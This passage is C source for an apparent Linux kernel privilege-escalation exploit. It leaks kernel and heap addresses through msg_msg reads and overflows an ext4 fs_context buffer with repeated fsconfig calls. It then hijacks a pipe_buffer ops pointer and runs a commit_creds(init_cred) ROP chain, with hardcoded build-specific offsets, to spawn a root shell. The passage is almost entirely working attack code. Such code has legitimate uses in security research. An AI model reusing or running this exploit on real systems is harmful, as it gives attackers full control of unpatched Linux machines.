        if(res<0)err_exit("peek_msg");
        if(res==0x1060){
            /* leak[510] is taken as a kernel text pointer; 0x1336770 is its
             * offset from the base in the author's target build. */
            kbase=leak[510]-0x1336770;
            break;
        }
    }
    //sleep(10);
    if(kbase==0||(kbase&0xfff)!=0){     /* sanity check: base must be page-aligned */
        printf("[-] leak kbase false!!!\n");
        exit(0);
    }
    printf("[+] kbase:%lx;\n",kbase);

    printf("[+] STEP2-------------------------------[+]\n");
    /* Step 2: leak a heap address the same way, reading far enough to reach
     * the `next` pointer of a msg_msg in the kmalloc-64 slab. */
    i=0;
    for(;i<8;i++){
        qr[i]=get_msg_queue();
        buf[5]=i+1;
        write_msg(qr[i],buf,4080,1);
    }
    fd = fsopen("ext4", 0);
    if(fd<0)err_exit("open ext4");
    printf("[+] start to overflow!!!\n");
    strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    i=0;
    for (; i < 117; i++)
        fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
    pat[21]='\x00';
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
    i=8;
    for(;i<16;i++){
        qr[i]=get_msg_queue();
        buf[5]=i+1;
        write_msg(qr[i],buf,4080,1);
    }
    char* evn="\x50\x16\x00";           /* new m_ts value: 0x1650 */
    fsconfig(fd,FSCONFIG_SET_STRING,"\x00",evn,0);
    printf("[+] start to spray heap_addr!!!\n");
    spray_msg();                        /* kmalloc-1k -> 64 -> 512 layout (see write-up) */
    memset(leak,0,8000);
    i=0;
    for(;i<16;i++){
        res=peek_msg(qr[i],leak,0x1650,0);
        if(res<0)perror("peek_msg");
        if(res==0x1650){
            /* Scan the copied-out data for the m_type marker 10 and take
             * the words before it as the leaked pointers. */
            int j=0;
            for(;j<1000;j++){
                if(leak[j]==10){
                    pipe_ff=leak[j-2];
                    gadget=leak[j-3]+0x30;
                    break;
                }
            }
            break;
        }
    }
    if(pipe_ff==0){
        printf("[-] leak heap_addr false!!!\n");
        exit(0);
    }
    printf("[+] pipe_ff:%lx;\n",pipe_ff);
    printf("[+] gadget:%lx;\n",gadget);

    printf("[+] STEP3-------------------------------[+]\n");
    /* Step 3: spray pipe_buffer arrays around the fs_context buffer, then
     * overwrite one so its ops pointer becomes `gadget`. */
    printf("[+] start to spray pipe_buffer!!!\n");
    i=0;
    for(;i<30;i++)
        pipe(pipe_fd[i]);
    i=0;
    for(;i<10;i++)
        fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);   /* resize: moves the buffer array to a larger slab */
    fd = fsopen("ext4", 0);
    if(fd<0)err_exit("open ext4");
    printf("[+] start to overflow!!!\n");
    strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    i=0;
    for (; i < 117; i++)
        fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
    i=10;
    for(;i<30;i++)
        fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);
    char value[40];
    memset(value,0x41,40);
    memcpy(value+15,&gadget,8);         /* gadget lands on the ops field of the neighbouring pipe_buffer */
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", value, 0);

    printf("[+] STEP4-------------------------------[+]\n");
    /* Step 4: free the step-2 spray, resolve kernel addresses from kbase
     * (offsets specific to the author's target build) and spray the
     * kmalloc-512 slab with the `add_rsp` gadget. */
    printf("[+] start to spray gadgets!!!\n");
    close_msg();
    pop_rdi=kbase+0x10475ed;
    commit_creds=kbase+0x10c9f00;
    init_cred=kbase+0x286b7a0;
    add_rsp=kbase+0x18abf50;
    restore=kbase+0x1e00fb8;
    spray_gadget();
    printf("[+] start to hijack control flow!!!\n");
    i=0;
    for(;i<30;i++){
        close(pipe_fd[i][0]);
        /* Register values staged for the pt_regs technique the write-up
         * describes; closing the write end releases the pipe_buffer and is
         * what invokes the overwritten ops. Intel syntax: the file is
         * presumably built with -masm=intel. */
        __asm__("mov r15,pop_rdi;"
                "mov r14,init_cred;"
                "mov r13,commit_creds;"
                "mov r12,restore;"
                "mov rbp,0xdeadbeef;"
                "mov rbx,0xdeadbeef;"
                "mov r11,0xdeadbeef;"
                "mov r10,0xdeadbeef;"
                "mov r9,0xdeadbeef;"
                "mov r8,0xdeadbeef");
        close(pipe_fd[i][1]);
    }
    get_shell();
    return 0;
}

 
